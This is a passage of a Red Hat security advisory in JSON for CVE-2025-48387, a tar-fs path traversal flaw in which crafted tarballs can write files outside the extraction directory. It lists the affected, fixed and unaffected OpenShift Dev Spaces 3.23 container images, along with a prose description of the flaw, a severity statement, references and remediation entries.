            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2369875"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in tar-fs. This vulnerability allows files to be written outside the intended extraction directory via specially crafted tar archives. The issue arises from insufficient path validation during tarball extraction, potentially enabling path traversal attacks that can overwrite arbitrary files on the system.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "tar-fs: tar-fs has issue where extract can write outside the specified dir with a specific tarball",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability in tar-fs is Important not a moderate flaw, primarily due to its ability to bypass directory confinement during tarball extraction. The core issue\u2014path traversal via crafted archive entries\u2014allows attackers to write files outside the intended extraction directory, potentially overwriting system files, configuration files, or injecting malicious scripts into sensitive locations. Unlike moderate flaws that may require specific conditions or user interaction to exploit, this vulnerability can be triggered automatically in server-side environments that extract user-supplied tar files (e.g., CI/CD systems, deployment tools, or file upload handlers). Its exploitation could lead to remote code execution, privilege escalation, or denial of service, depending on the context.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-48387"
        },
        {
          "category": "external",
          "summary": "RHBZ#2369875",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369875"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-48387",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-48387"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-48387",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48387"
        },
        {
          "category": "external",
          "summary": "https://github.com/mafintosh/tar-fs/commit/647447b572bc135c41035e82ca7b894f02b17f0f",
          "url": "https://github.com/mafintosh/tar-fs/commit/647447b572bc135c41035e82ca7b894f02b17f0f"
        },
        {
          "category": "external",
          "summary": "https://github.com/mafintosh/tar-fs/security/advisories/GHSA-8cj5-5rvv-wf4v",
          "url": "https://github.com/mafintosh/tar-fs/security/advisories/GHSA-8cj5-5rvv-wf4v"
        }
      ],
      "release_date": "2025-06-02T19:20:18.220000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation is either unavailable or does not meet Red Hat Product Security standards for usability, deployment, applicability, or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
